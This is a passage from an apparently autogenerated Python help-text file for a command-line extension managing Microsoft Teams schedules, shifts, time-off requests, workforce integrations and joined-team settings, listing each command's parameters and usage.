display-name: The shift label of the shiftItem.
notes: The shift notes for the shiftItem.
"""
helps['teams team-schedule create-open-shift-change-request'] = """
type: command
short-summary: "Create new navigation property to openShiftChangeRequests for teams."
parameters:
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
"""
helps['teams team-schedule create-scheduling-group'] = """
type: command
short-summary: "Create new navigation property to schedulingGroups for teams."
parameters:
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
"""
helps['teams team-schedule create-shift'] = """
type: command
short-summary: "Create new navigation property to shifts for teams."
parameters:
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --activities
short-summary: "An incremental part of a shift which can cover details of when and where an employee is during \
their shift. For example, an assignment or a scheduled break or lunch. Required."
long-summary: |
Usage: --activities code=XX display-name=XX end-date-time=XX is-paid=XX start-date-time=XX theme=XX
code: Customer defined code for the shiftActivity. Required.
display-name: The name of the shiftActivity. Required.
end-date-time: The end date and time for the shiftActivity. The Timestamp type represents date and time \
information using ISO 8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like \
this: '2014-01-01T00:00:00Z'. Required.
is-paid: Indicates whether the microsoft.graph.user should be paid for the activity during their shift. \
Required.
start-date-time: The start date and time for the shiftActivity. The Timestamp type represents date and \
time information using ISO 8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look \
like this: '2014-01-01T00:00:00Z'. Required.
Multiple actions can be specified by using more than one --activities argument.
- name: --microsoft-graph-shift-item-activities
short-summary: "An incremental part of a shift which can cover details of when and where an employee is during \
their shift. For example, an assignment or a scheduled break or lunch. Required."
long-summary: |
Usage: --microsoft-graph-shift-item-activities code=XX display-name=XX end-date-time=XX is-paid=XX \
start-date-time=XX theme=XX
code: Customer defined code for the shiftActivity. Required.
display-name: The name of the shiftActivity. Required.
end-date-time: The end date and time for the shiftActivity. The Timestamp type represents date and time \
information using ISO 8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like \
this: '2014-01-01T00:00:00Z'. Required.
is-paid: Indicates whether the microsoft.graph.user should be paid for the activity during their shift. \
Required.
start-date-time: The start date and time for the shiftActivity. The Timestamp type represents date and \
time information using ISO 8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look \
like this: '2014-01-01T00:00:00Z'. Required.
Multiple actions can be specified by using more than one --microsoft-graph-shift-item-activities argument.
"""
helps['teams team-schedule create-swap-shift-change-request'] = """
type: command
short-summary: "Create new navigation property to swapShiftsChangeRequests for teams."
parameters:
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
"""
helps['teams team-schedule create-time-off'] = """
type: command
short-summary: "Create new navigation property to timesOff for teams."
parameters:
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --draft-time-off
short-summary: "timeOffItem"
long-summary: |
Usage: --draft-time-off time-off-reason-id=XX end-date-time=XX start-date-time=XX theme=XX
time-off-reason-id: ID of the timeOffReason for this timeOffItem. Required.
- name: --shared-time-off
short-summary: "timeOffItem"
long-summary: |
Usage: --shared-time-off time-off-reason-id=XX end-date-time=XX start-date-time=XX theme=XX
time-off-reason-id: ID of the timeOffReason for this timeOffItem. Required.
"""
helps['teams team-schedule create-time-off-reason'] = """
type: command
short-summary: "Create new navigation property to timeOffReasons for teams."
parameters:
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
"""
helps['teams team-schedule create-time-off-request'] = """
type: command
short-summary: "Create new navigation property to timeOffRequests for teams."
parameters:
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
"""
helps['teams team-schedule delete-offer-shift-request'] = """
type: command
short-summary: "Delete navigation property offerShiftRequests for teams."
"""
helps['teams team-schedule delete-open-shift'] = """
type: command
short-summary: "Delete navigation property openShifts for teams."
"""
helps['teams team-schedule delete-open-shift-change-request'] = """
type: command
short-summary: "Delete navigation property openShiftChangeRequests for teams."
"""
helps['teams team-schedule delete-scheduling-group'] = """
type: command
short-summary: "Delete navigation property schedulingGroups for teams."
"""
helps['teams team-schedule delete-shift'] = """
type: command
short-summary: "Delete navigation property shifts for teams."
"""
helps['teams team-schedule delete-swap-shift-change-request'] = """
type: command
short-summary: "Delete navigation property swapShiftsChangeRequests for teams."
"""
helps['teams team-schedule delete-time-off'] = """
type: command
short-summary: "Delete navigation property timesOff for teams."
"""
helps['teams team-schedule delete-time-off-reason'] = """
type: command
short-summary: "Delete navigation property timeOffReasons for teams."
"""
helps['teams team-schedule delete-time-off-request'] = """
type: command
short-summary: "Delete navigation property timeOffRequests for teams."
"""
helps['teams team-schedule list-offer-shift-request'] = """
type: command
short-summary: "Get offerShiftRequests from teams."
"""
helps['teams team-schedule list-open-shift'] = """
type: command
short-summary: "Get openShifts from teams."
"""
helps['teams team-schedule list-open-shift-change-request'] = """
type: command
short-summary: "Get openShiftChangeRequests from teams."
"""
helps['teams team-schedule list-scheduling-group'] = """
type: command
short-summary: "Get schedulingGroups from teams."
"""
helps['teams team-schedule list-shift'] = """
type: command
short-summary: "Get shifts from teams."
"""
helps['teams team-schedule list-swap-shift-change-request'] = """
type: command
short-summary: "Get swapShiftsChangeRequests from teams."
"""
helps['teams team-schedule list-time-off'] = """
type: command
short-summary: "Get timesOff from teams."
"""
helps['teams team-schedule list-time-off-reason'] = """
type: command
short-summary: "Get timeOffReasons from teams."
"""
helps['teams team-schedule list-time-off-request'] = """
type: command
short-summary: "Get timeOffRequests from teams."
"""
helps['teams team-schedule share'] = """
type: command
short-summary: "Invoke action share."
"""
helps['teams team-schedule show-offer-shift-request'] = """
type: command
short-summary: "Get offerShiftRequests from teams."
"""
helps['teams team-schedule show-open-shift'] = """
type: command
short-summary: "Get openShifts from teams."
"""
helps['teams team-schedule show-open-shift-change-request'] = """
type: command
short-summary: "Get openShiftChangeRequests from teams."
"""
helps['teams team-schedule show-scheduling-group'] = """
type: command
short-summary: "Get schedulingGroups from teams."
"""
helps['teams team-schedule show-shift'] = """
type: command
short-summary: "Get shifts from teams."
"""
helps['teams team-schedule show-swap-shift-change-request'] = """
type: command
short-summary: "Get swapShiftsChangeRequests from teams."
"""
helps['teams team-schedule show-time-off'] = """
type: command
short-summary: "Get timesOff from teams."
"""
helps['teams team-schedule show-time-off-reason'] = """
type: command
short-summary: "Get timeOffReasons from teams."
"""
helps['teams team-schedule show-time-off-request'] = """
type: command
short-summary: "Get timeOffRequests from teams."
"""
helps['teams team-schedule update-offer-shift-request'] = """
type: command
short-summary: "Update the navigation property offerShiftRequests in teams."
parameters:
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
"""
helps['teams team-schedule update-open-shift'] = """
type: command
short-summary: "Update the navigation property openShifts in teams."
parameters:
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --draft-open-shift
short-summary: "openShiftItem"
long-summary: |
Usage: --draft-open-shift open-slot-count=XX activities=XX display-name=XX notes=XX end-date-time=XX \
start-date-time=XX theme=XX
open-slot-count: Count of the number of slots for the given open shift.
activities: An incremental part of a shift which can cover details of when and where an employee is during \
their shift. For example, an assignment or a scheduled break or lunch. Required.
display-name: The shift label of the shiftItem.
notes: The shift notes for the shiftItem.
- name: --shared-open-shift
short-summary: "openShiftItem"
long-summary: |
Usage: --shared-open-shift open-slot-count=XX activities=XX display-name=XX notes=XX end-date-time=XX \
start-date-time=XX theme=XX
open-slot-count: Count of the number of slots for the given open shift.
activities: An incremental part of a shift which can cover details of when and where an employee is during \
their shift. For example, an assignment or a scheduled break or lunch. Required.
display-name: The shift label of the shiftItem.
notes: The shift notes for the shiftItem.
"""
helps['teams team-schedule update-open-shift-change-request'] = """
type: command
short-summary: "Update the navigation property openShiftChangeRequests in teams."
parameters:
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
"""
helps['teams team-schedule update-scheduling-group'] = """
type: command
short-summary: "Update the navigation property schedulingGroups in teams."
parameters:
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
"""
helps['teams team-schedule update-shift'] = """
type: command
short-summary: "Update the navigation property shifts in teams."
parameters:
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --activities
short-summary: "An incremental part of a shift which can cover details of when and where an employee is during \
their shift. For example, an assignment or a scheduled break or lunch. Required."
long-summary: |
Usage: --activities code=XX display-name=XX end-date-time=XX is-paid=XX start-date-time=XX theme=XX
code: Customer defined code for the shiftActivity. Required.
display-name: The name of the shiftActivity. Required.
end-date-time: The end date and time for the shiftActivity. The Timestamp type represents date and time \
information using ISO 8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like \
this: '2014-01-01T00:00:00Z'. Required.
is-paid: Indicates whether the microsoft.graph.user should be paid for the activity during their shift. \
Required.
start-date-time: The start date and time for the shiftActivity. The Timestamp type represents date and \
time information using ISO 8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look \
like this: '2014-01-01T00:00:00Z'. Required.
Multiple actions can be specified by using more than one --activities argument.
- name: --microsoft-graph-shift-item-activities
short-summary: "An incremental part of a shift which can cover details of when and where an employee is during \
their shift. For example, an assignment or a scheduled break or lunch. Required."
long-summary: |
Usage: --microsoft-graph-shift-item-activities code=XX display-name=XX end-date-time=XX is-paid=XX \
start-date-time=XX theme=XX
code: Customer defined code for the shiftActivity. Required.
display-name: The name of the shiftActivity. Required.
end-date-time: The end date and time for the shiftActivity. The Timestamp type represents date and time \
information using ISO 8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like \
this: '2014-01-01T00:00:00Z'. Required.
is-paid: Indicates whether the microsoft.graph.user should be paid for the activity during their shift. \
Required.
start-date-time: The start date and time for the shiftActivity. The Timestamp type represents date and \
time information using ISO 8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look \
like this: '2014-01-01T00:00:00Z'. Required.
Multiple actions can be specified by using more than one --microsoft-graph-shift-item-activities argument.
"""
helps['teams team-schedule update-swap-shift-change-request'] = """
type: command
short-summary: "Update the navigation property swapShiftsChangeRequests in teams."
parameters:
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
"""
helps['teams team-schedule update-time-off'] = """
type: command
short-summary: "Update the navigation property timesOff in teams."
parameters:
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --draft-time-off
short-summary: "timeOffItem"
long-summary: |
Usage: --draft-time-off time-off-reason-id=XX end-date-time=XX start-date-time=XX theme=XX
time-off-reason-id: ID of the timeOffReason for this timeOffItem. Required.
- name: --shared-time-off
short-summary: "timeOffItem"
long-summary: |
Usage: --shared-time-off time-off-reason-id=XX end-date-time=XX start-date-time=XX theme=XX
time-off-reason-id: ID of the timeOffReason for this timeOffItem. Required.
"""
helps['teams team-schedule update-time-off-reason'] = """
type: command
short-summary: "Update the navigation property timeOffReasons in teams."
parameters:
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
"""
helps['teams team-schedule update-time-off-request'] = """
type: command
short-summary: "Update the navigation property timeOffRequests in teams."
parameters:
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
"""
helps['teams teamwork-teamwork'] = """
type: group
short-summary: Manage teamwork teamwork with teams_v1_0
"""
helps['teams teamwork-teamwork show-teamwork'] = """
type: command
short-summary: "Get teamwork."
"""
helps['teams teamwork-teamwork update-teamwork'] = """
type: command
short-summary: "Update teamwork."
"""
helps['teams teamwork'] = """
type: group
short-summary: Manage teamwork with teams_v1_0
"""
helps['teams teamwork create-workforce-integration'] = """
type: command
short-summary: "Create new navigation property to workforceIntegrations for teamwork."
parameters:
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --encryption
short-summary: "workforceIntegrationEncryption"
long-summary: |
Usage: --encryption protocol=XX secret=XX
secret: Encryption shared secret.
"""
helps['teams teamwork delete-workforce-integration'] = """
type: command
short-summary: "Delete navigation property workforceIntegrations for teamwork."
"""
helps['teams teamwork list-workforce-integration'] = """
type: command
short-summary: "Get workforceIntegrations from teamwork."
"""
helps['teams teamwork show-workforce-integration'] = """
type: command
short-summary: "Get workforceIntegrations from teamwork."
"""
helps['teams teamwork update-workforce-integration'] = """
type: command
short-summary: "Update the navigation property workforceIntegrations in teamwork."
parameters:
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --encryption
short-summary: "workforceIntegrationEncryption"
long-summary: |
Usage: --encryption protocol=XX secret=XX
secret: Encryption shared secret.
"""
helps['teams user'] = """
type: group
short-summary: Manage user with teams_v1_0
"""
helps['teams user create-joined-team'] = """
type: command
short-summary: "Create new navigation property to joinedTeams for users."
parameters:
- name: --fun-settings
short-summary: "teamFunSettings"
long-summary: |
Usage: --fun-settings allow-custom-memes=XX allow-giphy=XX allow-stickers-and-memes=XX \
giphy-content-rating=XX
allow-custom-memes: If set to true, enables users to include custom memes.
allow-giphy: If set to true, enables Giphy use.
allow-stickers-and-memes: If set to true, enables users to include stickers and memes.
- name: --guest-settings
short-summary: "teamGuestSettings"
long-summary: |
Usage: --guest-settings allow-create-update-channels=XX allow-delete-channels=XX
allow-create-update-channels: If set to true, guests can add and update channels.
allow-delete-channels: If set to true, guests can delete channels.
- name: --member-settings
short-summary: "teamMemberSettings"
long-summary: |
Usage: --member-settings allow-add-remove-apps=XX allow-create-private-channels=XX \
allow-create-update-channels=XX allow-create-update-remove-connectors=XX allow-create-update-remove-tabs=XX \
allow-delete-channels=XX
allow-add-remove-apps: If set to true, members can add and remove apps.
allow-create-private-channels: If set to true, members can add and update private channels.
allow-create-update-channels: If set to true, members can add and update channels.
allow-create-update-remove-connectors: If set to true, members can add, update, and remove connectors.
allow-create-update-remove-tabs: If set to true, members can add, update, and remove tabs.
allow-delete-channels: If set to true, members can delete channels.
- name: --messaging-settings
short-summary: "teamMessagingSettings"
long-summary: |
Usage: --messaging-settings allow-channel-mentions=XX allow-owner-delete-messages=XX \
allow-team-mentions=XX allow-user-delete-messages=XX allow-user-edit-messages=XX
allow-channel-mentions: If set to true, @channel mentions are allowed.
allow-owner-delete-messages: If set to true, owners can delete any message.
allow-team-mentions: If set to true, @team mentions are allowed.
allow-user-delete-messages: If set to true, users can delete their messages.
allow-user-edit-messages: If set to true, users can edit their messages.
- name: --members
short-summary: "Members and owners of the team."
long-summary: |
Usage: --members display-name=XX roles=XX id=XX
display-name: The display name of the user.
roles: The roles for that user.
id: Read-only.
Multiple actions can be specified by using more than one --members argument.
- name: --assigned-labels
short-summary: "The list of sensitivity label pairs (label ID, label name) associated with an Microsoft 365 \
group. Returned only on $select. Read-only."
long-summary: |
Usage: --assigned-labels display-name=XX label-id=XX
display-name: The display name of the label. Read-only.
label-id: The unique identifier of the label.
Multiple actions can be specified by using more than one --assigned-labels argument.
- name: --assigned-licenses
short-summary: "The licenses that are assigned to the group. Returned only on $select. Read-only."
long-summary: |
Usage: --assigned-licenses disabled-plans=XX sku-id=XX
disabled-plans: A collection of the unique identifiers for plans that have been disabled.
sku-id: The unique identifier for the SKU.
Multiple actions can be specified by using more than one --assigned-licenses argument.
- name: --license-processing-state
short-summary: "licenseProcessingState"
long-summary: |
Usage: --license-processing-state state=XX
- name: --on-premises-provisioning-errors
short-summary: "Errors when using Microsoft synchronization product during provisioning. Returned by default."
long-summary: |
Usage: --on-premises-provisioning-errors category=XX occurred-date-time=XX property-causing-error=XX \
value=XX
category: Category of the provisioning error. Note: Currently, there is only one possible value. Possible \
value: PropertyConflict - indicates a property value is not unique. Other objects contain the same value for the \
property.
occurred-date-time: The date and time at which the error occurred.
property-causing-error: Name of the directory property causing the error. Current possible values: \
UserPrincipalName or ProxyAddress
value: Value of the property causing the error.
Multiple actions can be specified by using more than one --on-premises-provisioning-errors argument.
- name: --app-role-assignments
long-summary: |
Usage: --app-role-assignments app-role-id=XX created-date-time=XX principal-display-name=XX \
principal-id=XX principal-type=XX resource-display-name=XX resource-id=XX deleted-date-time=XX id=XX
app-role-id: The identifier (id) for the app role which is assigned to the principal. This app role must \
be exposed in the appRoles property on the resource application's service principal (resourceId). If the resource \
application has not declared any app roles, a default app role ID of 00000000-0000-0000-0000-000000000000 can be \
specified to signal that the principal is assigned to the resource app without any specific app roles. Required on \
create. Does not support $filter.
principal-display-name: The display name of the user, group, or service principal that was granted the app \
role assignment. Read-only. Supports $filter (eq and startswith).
principal-id: The unique identifier (id) for the user, group or service principal being granted the app \
role. Required on create. Does not support $filter.
principal-type: The type of the assigned principal. This can either be 'User', 'Group' or \
'ServicePrincipal'. Read-only. Does not support $filter.
resource-display-name: The display name of the resource app's service principal to which the assignment is \
made. Does not support $filter.
resource-id: The unique identifier (id) for the resource service principal for which the assignment is \
made. Required on create. Supports $filter (eq only).
id: Read-only.
Multiple actions can be specified by using more than one --app-role-assignments argument.
- name: --created-on-behalf-of
short-summary: "Represents an Azure Active Directory object. The directoryObject type is the base type for \
many other directory entity types."
long-summary: |
Usage: --created-on-behalf-of deleted-date-time=XX id=XX
id: Read-only.
- name: --member-of
short-summary: "Groups that this group is a member of. HTTP Methods: GET (supported for all groups). \
Read-only. Nullable."
long-summary: |
Usage: --member-of deleted-date-time=XX id=XX
id: Read-only.
